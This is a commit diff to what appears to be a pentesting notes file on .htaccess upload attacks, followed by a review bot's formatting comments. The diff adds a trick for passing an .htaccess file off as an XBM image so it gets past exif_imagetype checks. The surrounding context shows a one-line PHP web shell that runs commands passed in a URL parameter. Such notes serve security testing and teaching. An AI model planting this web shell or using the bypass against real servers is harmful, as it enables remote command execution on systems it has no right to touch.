Add exif_imagetype bypass

Vladislav Nechakhin 2019-02-02 17:29:04 +07:00
parent ffde81e2c0
commit b30ac4e5bb


@ -25,7 +25,18 @@ AddType application/x-httpd-php .htaccess
<?php echo "\n";passthru($_GET['c']." 2>&1"); ?> <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
``` ```
# .htaccess upload as image
If on server side for determine the type of an image used exif_imagetype function, try upload .htaccess file like [X BitMap (XBM)](https://en.wikipedia.org/wiki/X_BitMap) image.
```python
#define test_width 100
#define test_height 100
# .htaccess file
```
## Thanks to ## Thanks to
* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html) * [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
* [](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability) * [Protection from Unrestricted File Upload Vulnerability](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
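
Review bot: the fence added under the new "# .htaccess upload as image" section is tagged `python`, but its contents are two XBM-style `#define` lines followed by a `# .htaccess file` placeholder, not Python; drop the tag or use a neutral one so the block is not mis-highlighted. The sentence introducing it ("If on server side for determine the type of an image used exif_imagetype function") is hard to parse. Something like "If the server uses exif_imagetype to determine the image type, ..." reads better, and one more line should say why the `#define` header can sit at the top of an .htaccess file, since the section leaves that unexplained. The new heading is a top-level `#` while the neighbouring "## Thanks to" is level two, so check that the level matches the other sections of the file. The link-text fix on the Qualys entry looks fine.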